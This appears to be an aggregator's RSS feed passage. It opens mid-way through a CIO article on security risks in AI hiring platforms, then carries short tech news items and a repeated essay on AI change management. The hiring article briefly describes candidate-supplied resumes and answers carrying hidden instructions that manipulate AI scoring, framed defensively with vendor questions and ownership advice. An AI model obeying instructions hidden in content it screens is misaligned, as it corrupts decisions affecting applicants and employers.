<p class="wp-block-paragraph"><a href="https://www.csoonline.com/article/4020919/mcdonalds-ai-hiring-tools-password-123456-exposes-data-of-64m-applicants.html">The 2025 McHire incident</a> should have made this impossible to ignore. Researchers reported that weaknesses in McDonald’s AI hiring platform, including default credentials and an access-control flaw, exposed applicant data at large scale before the issue was patched. The lesson for CIOs is not merely that a weak password was used. The lesson is that AI hiring systems can ship with basic, preventable security failures while still being treated as HR tools rather than enterprise risk surfaces.</p>



<h2 class="wp-block-heading">Vendor reputation does not transfer to every AI feature</h2>



<p class="wp-block-paragraph">One reason this risk slips through is that buyers often trust the platform brand. Mature vendors may have strong security programs, enterprise customers, compliance documentation and procurement-friendly answers.</p>



<p class="wp-block-paragraph">But AI features can change the architecture of risk.</p>



<p class="wp-block-paragraph">A platform that was safe as a workflow tool may behave very differently once it adds resume scoring, interview grading, chatbot screening or automated ranking. The new feature may introduce new inputs, new model behavior, new data flows, new third-party dependencies and new decision points. In practical terms, the attack surface has changed.</p>



<p class="wp-block-paragraph">CIOs should not allow AI features to inherit trust automatically from the legacy platform around them. When a vendor adds AI, the enterprise should reassess the feature as if it were a new product. That does not mean slowing innovation for bureaucracy. It means AI-enabled decision-making carries different failure modes from ordinary workflow automation.</p>



<h2 class="wp-block-heading">The ownership gap is the real vulnerability</h2>



<p class="wp-block-paragraph">The biggest risk may not be the model. It may be the ownership gap.</p>



<p class="wp-block-paragraph">Talent acquisition may buy the tool. HR operations may configure it. The vendor may guide implementation. Procurement and legal may approve the contract. But who owns the security of the candidate-facing AI layer?</p>



<p class="wp-block-paragraph">In many organizations, the honest answer is unclear.</p>



<p class="wp-block-paragraph">That ambiguity is where risk grows. Recruiting technology sits at the intersection of public input, sensitive data, third-party software, automated decision support and brand trust. That is exactly the kind of environment that needs named security ownership, asset inventory, vendor review, access-control testing, logging and incident-response planning.</p>



<p class="wp-block-paragraph">If the hiring stack is not in the security inventory, the organization is already making an assumption it may later regret.</p>



<h2 class="wp-block-heading">What CIOs should require now</h2>



<p class="wp-block-paragraph">The fix is not exotic. It is applying existing security discipline to a surface that has been underestimated.</p>



<p class="wp-block-paragraph">Treat every candidate submission as untrusted input. Resumes, cover letters, chatbot responses, interview transcripts and spoken answers should be handled as attacker-controllable content. If AI processes it, the system must separate content from instruction.</p>



<p class="wp-block-paragraph">Reassess vendors when AI features are introduced. A prior security review should not be treated as permanent approval for new AI capabilities. Ask what changed in the architecture, what data the model sees, what actions it can influence and how manipulation attempts are detected.</p>



<p class="wp-block-paragraph">Ask AI-specific questions before signing. Can candidate-provided content alter scoring? Are hidden instructions filtered or ignored? Is there human review before AI output influences a decision? Can the vendor produce testing evidence for prompt injection, access control and data exposure risks?</p>



<p class="wp-block-paragraph">Assign ownership. HR can own the process, but security must own the risk model. AI hiring systems should be included in third-party risk management, application security reviews, access governance, monitoring and incident response planning.</p>



<p class="wp-block-paragraph">Measure business impact, not just AI adoption. The goal is not to say the recruiting function uses AI. The goal is to improve hiring speed, quality, fairness and cost without creating new risk. If the system cannot protect decision integrity, the business case is weaker than it appears.</p>



<h2 class="wp-block-heading">The hiring platform is now part of the enterprise attack surface</h2>



<p class="wp-block-paragraph">AI has turned the careers page into more than a front door for applicants. It is now a public input channel feeding systems that store sensitive data and influence workforce decisions.</p>



<p class="wp-block-paragraph">That makes it a CIO concern.</p>



<p class="wp-block-paragraph">The next failure in AI hiring may not look like a traditional breach at first. It may look like bad rankings, manipulated scores, unexplainable decisions, wasted recruiter time or a candidate process no one trusts. But underneath those symptoms is a familiar security problem: A system trusted input it should have treated as hostile.</p>



<p class="wp-block-paragraph">Enterprises have hardened payment systems, customer portals, APIs and employee applications around that lesson. Hiring deserves the same treatment.</p>



<p class="wp-block-paragraph">AI hiring is not just an HR transformation. It is a security boundary. And it is time CIOs treated it like one.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Polish data center plans to send its waste heat to the neighbors]]></title>
<description><![CDATA[As Europe swelters in a heatwave, residents probably don’t want to hear about ways to make their homes even hotter, but that’s what Polish property developer Citylink is talking about, with plans to dump waste heat from a new data center in Wrocław into the municipal district heating network.



...]]></description>
<link>https://tsecurity.de/de/3710150/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710150/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As Europe swelters in a heatwave, residents probably don’t want to hear about ways to make their homes even hotter, but that’s what Polish property developer Citylink is talking about, with plans to dump waste heat from a new data center in Wrocław into the municipal district heating network.</p>



<p class="wp-block-paragraph">Citylink is designing the data center so that heat from servers can be recovered instead of being dissipated via cooling systems — and as the data center grows, any increase in computing power will mean more energy available for recovery.</p>



<p class="wp-block-paragraph">The collaboration with local power company Kogeneracja will provide “valuable experience in designing and operating modern data centers, with a particular focus on infrastructure dedicated to AI nodes,<em>” </em><a href="https://city-link.pl/en/heat-from-servers-could-power-wroclaw-citylink-and-kogeneracja-s-a-launch-collaboration/" target="_blank" rel="noreferrer noopener">said Michał Starybrat, development director at Citylink</a>.</p>



<p class="wp-block-paragraph">“The dynamic growth of the artificial intelligence and cloud technology markets generates unprecedented demand for computing power, this collaboration demonstrates how modern digital infrastructure can actively contribute to building the energy ecosystem of the future,” he added.</p>



<p class="wp-block-paragraph">This type of initiative is not new. There have been <a href="https://www.newcivilengineer.com/latest/data-centres-could-join-energy-ecosystem-as-report-presents-use-case-for-wasted-heat-16-10-2025/" target="_blank" rel="noreferrer noopener">similar projects in the UK</a> and <a href="https://www.reseller.co.nz/article/2503421/spark-aims-to-use-dc-heat-to-warm-a-new-north-shore-surf-spot.html">in New Zealand,</a> but with warnings that <a href="https://www.networkworld.com/article/4153403/no-joke-data-centers-are-warming-the-planet.html">data centers are contributing to the warming of the planet</a>, there may well be a lot more organizations looking to deploy that excess heat more fruitfully in the future.</p>



<p class="wp-block-paragraph">However, announcing it during a heatwave may not be the most politically sensitive approach to take.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.networkworld.com/article/4206791/polish-data-center-plans-to-send-its-waste-heat-to-the-neighbors.html">Network World</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Airtable joins Evernote, Brightcove, WeTransfer and AOL in Bending Spoons portfolio]]></title>
<description><![CDATA[Bending Spoons has snapped up Airtable to add to its portfolio of software companies, alongside AOL, Evernote, WeTransfer, Brightcove and Vimeo



Airtable made its name as a builder of low/no code database services, aimed particularly at non-technical staff, but is now one of many vendors facing...]]></description>
<link>https://tsecurity.de/de/3710151/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710151/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:39 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Bending Spoons has snapped up Airtable to add to its portfolio of software companies, alongside AOL, Evernote, WeTransfer, Brightcove and Vimeo</p>



<p class="wp-block-paragraph">Airtable made its name as a builder of <a href="https://www.infoworld.com/article/2334351/airtable-review-flexible-low-code-no-code-in-the-cloud.html">low/no code database services</a>, aimed particularly at non-technical staff, but is now one of many vendors facing financial difficulties in the face of the <a href="https://www.cio.com/article/4192242/agentic-ai-puts-234b-in-enterprise-saas-spending-at-risk-gartner-says.html">SaaS/AIpocalypse</a>. The arrival of AI coding tools, which offer non-technical employees more flexible ways to build business applications, has hit demand for its services.</p>



<p class="wp-block-paragraph">Bending Spoons bought Airtable in a deal it valued at just <a href="https://investors.bendingspoons.com/newsroom/bending-spoons-agrees-to-acquire-airtable">$1.285 billion</a>, a far cry from the <a href="https://www.bloomberg.com/news/articles/2026-08-04/bending-spoons-to-buy-software-firm-airtable-for-2-3-billion" target="_blank" rel="noreferrer noopener">$11.7 billion</a> Airtable was worth at its peak.</p>



<p class="wp-block-paragraph">Bending Spoons has built its portfolio by buying once-successful companies like Airtable that have struggled to cope with newer, nimbler competitors or failed to adapt to emerging technologies. <a href="https://www.forbes.com/sites/shivaramrajgopal/2026/07/06/bending-spoons-paid-33-billion-for-aol-vimeo-and-eventbrite-its-pro-forma-2025-profit-was-just-22-million/" target="_blank" rel="noreferrer noopener">Bending Spoons takes these companies, cuts costs and markets them aggressively</a> with the goal of returning them to profitability.</p>



<p class="wp-block-paragraph">“Airtable is a pioneering brand reshaping how teams organize data and manage critical workflows. We’re committed to investing in Airtable for the long run, and doubling down on its core strength: bringing teams and workflows together in one flexible workspace. We plan to expand what can be done across the full spectrum of work and make Airtable even more valuable to customers at every scale,” said Luca Ferrari, Bending Spoons CEO and co-founder.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4206772/airtable-joins-evernote-brightcove-wetransfer-and-aol-in-bending-spoons-portfolio.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rinn Pharma & Biopharma to join NordicPharmaTrain network]]></title>
<description><![CDATA[The partnership could significantly strengthen Ireland's position within the European pharmaceutical research and innovation space. 
Read more: Rinn Pharma & Biopharma to join NordicPharmaTrain network]]></description>
<link>https://tsecurity.de/de/3710138/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710138/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:37 +0200</pubDate>
<content:encoded><![CDATA[<p>The partnership could significantly strengthen Ireland's position within the European pharmaceutical research and innovation space. </p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/innovation/rinn-pharma-biopharma-nordicpharmatrain-network-ai-medicine">Rinn Pharma &amp; Biopharma to join NordicPharmaTrain network</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Chinese Philosopher Americans Can’t Stop Fighting About]]></title>
<description><![CDATA[Yiyang Zhuge was already an intellectual celebrity in China. Her viral interview with Christopher Nolan made her famous in the US—and quickly turned her into a political Rorschach test.]]></description>
<link>https://tsecurity.de/de/3709993/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709993/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:46:17 +0200</pubDate>
<content:encoded><![CDATA[Yiyang Zhuge was already an intellectual celebrity in China. Her viral interview with Christopher Nolan made her famous in the US—and quickly turned her into a political Rorschach test.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-Generated Code Turns a $100 Drone Into a Facial Recognition Tracker]]></title>
<description><![CDATA[AI coding models helped turn a roughly $100 consumer drone into a person-tracking system, raising new questions about AI safety and surveillance.]]></description>
<link>https://tsecurity.de/de/3709816/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709816/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:45:25 +0200</pubDate>
<content:encoded><![CDATA[AI coding models helped turn a roughly $100 consumer drone into a person-tracking system, raising new questions about AI safety and surveillance.]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta Launches Muse Code AI Coding Agent to Rival OpenAI and Anthropic]]></title>
<description><![CDATA[Meta launches Muse Code, a new AI coding agent aimed at OpenAI and Anthropic, with aggressive pricing and a new path toward enterprise AI revenue.]]></description>
<link>https://tsecurity.de/de/3709815/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709815/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 23:45:24 +0200</pubDate>
<content:encoded><![CDATA[Meta launches Muse Code, a new AI coding agent aimed at OpenAI and Anthropic, with aggressive pricing and a new path toward enterprise AI revenue.]]></content:encoded>
</item>
<item>
<title><![CDATA[What the first year of EU AI Act transparency enforcement could look like]]></title>
<description><![CDATA[In this Help Net Security interview, Edwin Weijdema, Field CTO at Veeam, answers questions on Article 50 of the EU AI Act and what the first year of enforcement might bring. He explains why corrective orders will likely outnumber large fines, when an AI agent working through a ticket queue counts...]]></description>
<link>https://tsecurity.de/de/3709714/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709714/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 11:27:09 +0200</pubDate>
<content:encoded><![CDATA[<p>In this Help Net Security interview, Edwin Weijdema, Field CTO at Veeam, answers questions on Article 50 of the EU AI Act and what the first year of enforcement might bring. He explains why corrective orders will likely outnumber large fines, when an AI agent working through a ticket queue counts as interacting with a person, and how security teams should handle simulated phishing that uses cloned voices. He also weighs where the first enforcement … <a href="https://www.helpnetsecurity.com/2026/08/07/edwin-weijdema-veeam-eu-ai-act-transparency/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/08/07/edwin-weijdema-veeam-eu-ai-act-transparency/">What the first year of EU AI Act transparency enforcement could look like</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise-wide AI transformation starts with change management]]></title>
<description><![CDATA[Technology leaders are facing a sobering reality: They’re investing heavily in AI, yet many initiatives continue to struggle to move beyond experimentation and pilot programs. For example, Gartner found only 28% of AI use cases in infrastructure and operations fully succeed and meet ROI expectati...]]></description>
<link>https://tsecurity.de/de/3709709/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709709/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 11:27:02 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Technology leaders are facing a sobering reality: They’re investing heavily in AI, yet many initiatives continue to struggle to move beyond experimentation and pilot programs. For example, Gartner found only <a href="https://www.gartner.com/en/newsroom/press-releases/2026-04-07-gartner-says-artificial-intelligence-projects-in-infrastructure-and-operations-stall-ahead-of-meaningful-roi-returns">28%</a> of AI use cases in infrastructure and operations fully succeed and meet ROI expectations, while 20% fail outright.</p>



<p class="wp-block-paragraph">The conversation around AI often focuses on models, tools and technical capabilities. Those decisions matter, but in my experience, they are rarely the only factors that determine success. The organizations realizing meaningful value from AI are also focused on operational readiness, governance, employee adoption and measurable outcomes.</p>



<p class="wp-block-paragraph">As both CIO and CDO, I spend a lot of time helping our organization navigate AI adoption while balancing the needs of our internal teams, our clients and running 24×7 secure operations. What I have learned is that AI transformation depends on how well the organization understands its data, improves its business processes and prepares people to work differently.</p>



<p class="wp-block-paragraph">I sometimes describe my role as being the organization’s traffic light. The green lights are easy – these are moments when the right answer is to accelerate. There are also moments when we need to slow down. As leaders, we must assess when we need to focus on the fundamentals and make sure the organization is ready for what comes next. And the most important decisions are the red lights – when we prevent the organization from spending time, money and energy on the wrong things.</p>



<h2 class="wp-block-heading">AI adoption breaks down when it does not fit how people work</h2>



<p class="wp-block-paragraph">One common misconception about AI transformation is that deployment automatically creates adoption. In practice, adoption happens when employees understand how the technology improves their work and have confidence in how it fits into their day-to-day responsibilities.</p>



<p class="wp-block-paragraph">I have seen AI pilots work well with small groups of users and then encounter challenges when expanded across larger teams. The technology may perform as expected, but the operating environment changes. Teams follow different workflows. Information is managed differently across functions. Employees have different levels of trust in the data. Success is not always measured the same way.</p>



<p class="wp-block-paragraph">These are readiness, process and change management issues.</p>



<p class="wp-block-paragraph">We saw similar lessons during our own transformation work. As part of a broader modernization program, we consolidated more than 50 engineering tools into one software delivery platform supporting thousands of developers. The technical migration mattered, but the bigger effort was helping teams adopt new ways of working and establish common practices.</p>



<p class="wp-block-paragraph">Anyone who has asked developers to move away from their favorite tools knows that change management is real. That experience reinforced a lesson: Transformation succeeds when people understand the value of the change, have the right support and can see how it improves the work they do every day.</p>



<p class="wp-block-paragraph">The same principle applies to AI.</p>



<p class="wp-block-paragraph">When we began introducing AI capabilities internally, we avoided a broad rollout from day one. Rolling AI out to thousands of employees is a process of education, adoption support and continuous learning. We introduced capabilities in phases, helped employees understand use cases relevant to their role and gave teams room to build confidence over time. Different teams adopt AI differently, so we found that cohort-based deployment and tailored change management created better long-term adoption than broad enterprise-wide rollouts.</p>



<p class="wp-block-paragraph">Pilots often succeed because the variables are limited. Production environments introduce the realities of the enterprise: inconsistent processes, disconnected data, unclear ownership and varying levels of employee readiness. In many cases, issues that surface during scaling can be traced back to operating model decisions, process gaps or unclear expectations.</p>



<p class="wp-block-paragraph">Employees need to understand where AI fits, when human judgment remains essential and how success will be measured. Without that clarity, scaling becomes much harder.</p>



<h2 class="wp-block-heading">Creating the operational conditions for AI success</h2>



<p class="wp-block-paragraph">The most successful AI transformations start before AI is introduced.</p>



<p class="wp-block-paragraph">They begin with understanding where employees experience friction. In most enterprises, those opportunities are not difficult to find. Repetitive administrative work and manual handoffs consume time and slow the business down. Employees directly in the workflows have the clearest view of where these issues exist.</p>



<p class="wp-block-paragraph">When we launched our own efficiency and transformation program, we deliberately did not start with AI. We started by evaluating our data, reviewing business processes and identifying opportunities to simplify how work was performed. We found that simplifying and standardizing workflows before introducing AI significantly reduced complexity during deployment. Rather than asking AI to compensate for fragmented processes, we focused first on creating a consistent operational foundation. We focused first on process improvement, automation and operational discipline. Once those foundations were in place, we began layering AI into the environment.</p>



<p class="wp-block-paragraph">AI outcomes are heavily influenced by the quality of the processes and the data along with the governance structures supporting them. If the underlying process is inconsistent, AI will struggle to create consistent value. If the process is understood, governed and measurable, AI has a much stronger foundation.</p>



<p class="wp-block-paragraph">I often say that good data and good processes deliver good AI outcomes. That continues to hold true regardless of the model or technology being deployed.</p>



<p class="wp-block-paragraph">The real challenge is making sure employees know what AI is using, where it fits in the workflow and when they should rely on the output. If that is unclear, adoption slows. People may not trust the answer, may use the tool inconsistently or may avoid changing how work gets done.</p>



<p class="wp-block-paragraph">Before scaling AI, leaders need to answer a few basic questions. What problem are we solving? Is the process consistent enough? Is the data reliable enough? Where does human judgment still matter? And how will we know whether the tool is improving the work? Those questions determine whether AI becomes part of how teams operate.</p>



<h2 class="wp-block-heading">Measure outcomes before you scale</h2>



<p class="wp-block-paragraph">AI programs often lose momentum when leaders measure activity instead of impact. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-30-gartner-survey-finds-forty-five-percent-of-organizations-with-high-artificial-intelligence-maturity-keep-artificial-intelligence-projects-operational-for-at-least-three-years?">63% of high-maturity organizations</a> implement formal metrics to evaluate transformation efforts.</p>



<p class="wp-block-paragraph">Leaders often track how many employees have access to AI, how many licenses have been provisioned or how many use cases have been launched. Those metrics can be useful, but they do not always show whether the organization is creating business value. Activity is not the same as impact.</p>



<p class="wp-block-paragraph">The more meaningful indicators are instead tied to operational performance: support ticket volumes, incident reduction, productivity improvements, user experience, cycle times and service quality.</p>



<p class="wp-block-paragraph">We have seen the value of this approach firsthand. As part of our transformation program, we standardized service delivery processes and moved hundreds of teams onto a common service management platform. In our own experience, process improvements and platform consolidation initially reduced support ticket volumes by approximately 30%.</p>



<p class="wp-block-paragraph">After that foundation was established, additional automation and AI capabilities helped drive reductions closer to 70%.</p>



<p class="wp-block-paragraph">The initial improvement came from better processes and greater operational consistency. Automation and AI then helped accelerate the results. That is the pattern leaders should look for: Identify where work slows down, improve the process, establish accountability and introduce AI where the environment is ready to support it.</p>



<p class="wp-block-paragraph">This approach also helps build trust. Employees can see the value being created. Leaders can measure progress. Teams can learn from early deployments before scaling more broadly.</p>



<h2 class="wp-block-heading">Preparing people is the real AI strategy</h2>



<p class="wp-block-paragraph">Technology adoption has always been closely connected to people.</p>



<p class="wp-block-paragraph">Employees are more likely to embrace change when they understand how technology helps them be more effective. They need practical experience, clear expectations and opportunities to learn. AI introduces new ways of working, and organizations need to prepare employees for that shift.</p>



<p class="wp-block-paragraph">In our own organization, we encouraged every employee to establish an AI-related learning goal because familiarity with emerging technologies is becoming part of every role. Some goals were simple. Some were more advanced. The important point was creating a culture where people continue to learn and understand how AI applies to their work versus forcing AI activity broadly all at once.</p>



<p class="wp-block-paragraph">As AI becomes more embedded in enterprise operations, organizations with strong foundations in governance, process discipline and workforce readiness will be better positioned to capture long-term value.</p>



<p class="wp-block-paragraph">The companies realizing the greatest value from AI are investing in technology while also strengthening the operating models, information management practices and employee capabilities that support adoption. Sustainable transformation requires attention to people, processes, data and technology.</p>



<p class="wp-block-paragraph">Preparing people, building trust and creating clear operating models remain central to any successful AI strategy.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta veröffentlicht Coding-Tool Muse Code]]></title>
<description><![CDATA[Meta hat mit Muse Code sein erstes eigenständiges Werkzeug für die KI-gestützte Softwareentwicklung vorgestellt. Das Tool befindet sich derzeit in der Beta-Phase und läuft auf dem neuen Modell Muse Spark 1.2.

Tags: #Meta | #Programmieren]]></description>
<link>https://tsecurity.de/de/3709693/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709693/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 11:25:43 +0200</pubDate>
<content:encoded><![CDATA[<p><img width="1920" height="1080" src="https://www.it-daily.net/wp-content/uploads/2026/08/Muse-Code-Quelle-Screenshot-Meta-1920.jpg" class="attachment-full size-full wp-post-image" alt="Meta Muse Code" decoding="async" srcset="https://www.it-daily.net/wp-content/uploads/2026/08/Muse-Code-Quelle-Screenshot-Meta-1920.jpg 1920w, https://www.it-daily.net/wp-content/uploads/2026/08/Muse-Code-Quelle-Screenshot-Meta-1920-300x169.jpg 300w, https://www.it-daily.net/wp-content/uploads/2026/08/Muse-Code-Quelle-Screenshot-Meta-1920-1024x576.jpg 1024w, https://www.it-daily.net/wp-content/uploads/2026/08/Muse-Code-Quelle-Screenshot-Meta-1920-768x432.jpg 768w, https://www.it-daily.net/wp-content/uploads/2026/08/Muse-Code-Quelle-Screenshot-Meta-1920-1536x864.jpg 1536w" sizes="(max-width: 1920px) 100vw, 1920px" title="Meta veröffentlicht Coding-Tool Muse Code 16"></p>
    Meta hat mit Muse Code sein erstes eigenständiges Werkzeug für die KI-gestützte Softwareentwicklung vorgestellt. Das Tool befindet sich derzeit in der Beta-Phase und läuft auf dem neuen Modell Muse Spark 1.2.

<p>Tags: <a href="https://www.it-daily.net/thema/meta-en">#Meta</a> | <a href="https://www.it-daily.net/thema/programmieren">#Programmieren</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Enterprise-wide AI transformation starts with change management]]></title>
<description><![CDATA[Technology leaders are facing a sobering reality: They’re investing heavily in AI, yet many initiatives continue to struggle to move beyond experimentation and pilot programs. For example, Gartner found only 28% of AI use cases in infrastructure and operations fully succeed and meet ROI expectati...]]></description>
<link>https://tsecurity.de/de/3709645/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3709645/nachrichtenportal/</guid>
<pubDate>Fri, 07 Aug 2026 11:25:14 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Technology leaders are facing a sobering reality: They’re investing heavily in AI, yet many initiatives continue to struggle to move beyond experimentation and pilot programs. For example, Gartner found only <a href="https://www.gartner.com/en/newsroom/press-releases/2026-04-07-gartner-says-artificial-intelligence-projects-in-infrastructure-and-operations-stall-ahead-of-meaningful-roi-returns">28%</a> of AI use cases in infrastructure and operations fully succeed and meet ROI expectations, while 20% fail outright.</p>



<p class="wp-block-paragraph">The conversation around AI often focuses on models, tools and technical capabilities. Those decisions matter, but in my experience, they are rarely the only factors that determine success. The organizations realizing meaningful value from AI are also focused on operational readiness, governance, employee adoption and measurable outcomes.</p>



<p class="wp-block-paragraph">As both CIO and CDO, I spend a lot of time helping our organization navigate AI adoption while balancing the needs of our internal teams, our clients and running 24×7 secure operations. What I have learned is that AI transformation depends on how well the organization understands its data, improves its business processes and prepares people to work differently.</p>



<p class="wp-block-paragraph">I sometimes describe my role as being the organization’s traffic light. The green lights are easy – these are moments when the right answer is to accelerate. There are also moments when we need to slow down. As leaders, we must assess when we need to focus on the fundamentals and make sure the organization is ready for what comes next. And the most important decisions are the red lights – when we prevent the organization from spending time, money and energy on the wrong things.</p>



<h2 class="wp-block-heading">AI adoption breaks down when it does not fit how people work</h2>



<p class="wp-block-paragraph">One common misconception about AI transformation is that deployment automatically creates adoption. In practice, adoption happens when employees understand how the technology improves their work and have confidence in how it fits into their day-to-day responsibilities.</p>



<p class="wp-block-paragraph">I have seen AI pilots work well with small groups of users and then encounter challenges when expanded across larger teams. The technology may perform as expected, but the operating environment changes. Teams follow different workflows. Information is managed differently across functions. Employees have different levels of trust in the data. Success is not always measured the same way.</p>



<p class="wp-block-paragraph">These are readiness, process and change management issues.</p>



<p class="wp-block-paragraph">We saw similar lessons during our own transformation work. As part of a broader modernization program, we consolidated more than 50 engineering tools into one software delivery platform supporting thousands of developers. The technical migration mattered, but the bigger effort was helping teams adopt new ways of working and establish common practices.</p>



<p class="wp-block-paragraph">Anyone who has asked developers to move away from their favorite tools knows that change management is real. That experience reinforced a lesson: Transformation succeeds when people understand the value of the change, have the right support and can see how it improves the work they do every day.</p>



<p class="wp-block-paragraph">The same principle applies to AI.</p>



<p class="wp-block-paragraph">When we began introducing AI capabilities internally, we avoided a broad rollout from day one. Rolling AI out to thousands of employees is a process of education, adoption support and continuous learning. We introduced capabilities in phases, helped employees understand use cases relevant to their role and gave teams room to build confidence over time. Different teams adopt AI differently, so we found that cohort-based deployment and tailored change management created better long-term adoption than broad enterprise-wide rollouts.</p>



<p class="wp-block-paragraph">Pilots often succeed because the variables are limited. Production environments introduce the realities of the enterprise: inconsistent processes, disconnected data, unclear ownership and varying levels of employee readiness. In many cases, issues that surface during scaling can be traced back to operating model decisions, process gaps or unclear expectations.</p>



<p class="wp-block-paragraph">Employees need to understand where AI fits, when human judgment remains essential and how success will be measured. Without that clarity, scaling becomes much harder.</p>



<h2 class="wp-block-heading">Creating the operational conditions for AI success</h2>



<p class="wp-block-paragraph">The most successful AI transformations start before AI is introduced.</p>



<p class="wp-block-paragraph">They begin with understanding where employees experience friction. In most enterprises, those opportunities are not difficult to find. Repetitive administrative work and manual handoffs consume time and slow the business down. Employees directly in the workflows have the clearest view of where these issues exist.</p>



<p class="wp-block-paragraph">When we launched our own efficiency and transformation program, we deliberately did not start with AI. We started by evaluating our data, reviewing business processes and identifying opportunities to simplify how work was performed. We found that simplifying and standardizing workflows before introducing AI significantly reduced complexity during deployment. Rather than asking AI to compensate for fragmented processes, we focused first on creating a consistent operational foundation. We focused first on process improvement, automation and operational discipline. Once those foundations were in place, we began layering AI into the environment.</p>



<p class="wp-block-paragraph">AI outcomes are heavily influenced by the quality of the processes and the data along with the governance structures supporting them. If the underlying process is inconsistent, AI will struggle to create consistent value. If the process is understood, governed and measurable, AI has a much stronger foundation.</p>



<p class="wp-block-paragraph">I often say that good data and good processes deliver good AI outcomes. That continues to hold true regardless of the model or technology being deployed.</p>



<p class="wp-block-paragraph">The real challenge is making sure employees know what AI is using, where it fits in the workflow and when they should rely on the output. If that is unclear, adoption slows. People may not trust the answer, may use the tool inconsistently or may avoid changing how work gets done.</p>



<p class="wp-block-paragraph">Before scaling AI, leaders need to answer a few basic questions. What problem are we solving? Is the process consistent enough? Is the data reliable enough? Where does human judgment still matter? And how will we know whether the tool is improving the work? Those questions determine whether AI becomes part of how teams operate.</p>



<h2 class="wp-block-heading">Measure outcomes before you scale</h2>



<p class="wp-block-paragraph">AI programs often lose momentum when leaders measure activity instead of impact. <a href="https://www.gartner.com/en/newsroom/press-releases/2025-06-30-gartner-survey-finds-forty-five-percent-of-organizations-with-high-artificial-intelligence-maturity-keep-artificial-intelligence-projects-operational-for-at-least-three-years?">63% of high-maturity organizations</a> implement formal metrics to evaluate transformation efforts.</p>



<p class="wp-block-paragraph">Leaders often track how many employees have access to AI, how many licenses have been provisioned or how many use cases have been launched. Those metrics can be useful, but they do not always show whether the organization is creating business value. Activity is not the same as impact.</p>



<p class="wp-block-paragraph">The more meaningful indicators are instead tied to operational performance: support ticket volumes, incident reduction, productivity improvements, user experience, cycle times and service quality.</p>



<p class="wp-block-paragraph">We have seen the value of this approach firsthand. As part of our transformation program, we standardized service delivery processes and moved hundreds of teams onto a common service management platform. In our own experience, process improvements and platform consolidation initially reduced support ticket volumes by approximately 30%.</p>



<p class="wp-block-paragraph">After that foundation was established, additional automation and AI capabilities helped drive reductions closer to 70%.</p>



<p class="wp-block-paragraph">The initial improvement came from better processes and greater operational consistency. Automation and AI then helped accelerate the results. That is the pattern leaders should look for: Identify where work slows down, improve the process, establish accountability and introduce AI where the environment is ready to support it.</p>



<p class="wp-block-paragraph">This approach also helps build trust. Employees can see the value being created. Leaders can measure progress. Teams can learn from early deployments before scaling more broadly.</p>



<h2 class="wp-block-heading">Preparing people is the real AI strategy</h2>



<p class="wp-block-paragraph">Technology adoption has always been closely connected to people.</p>



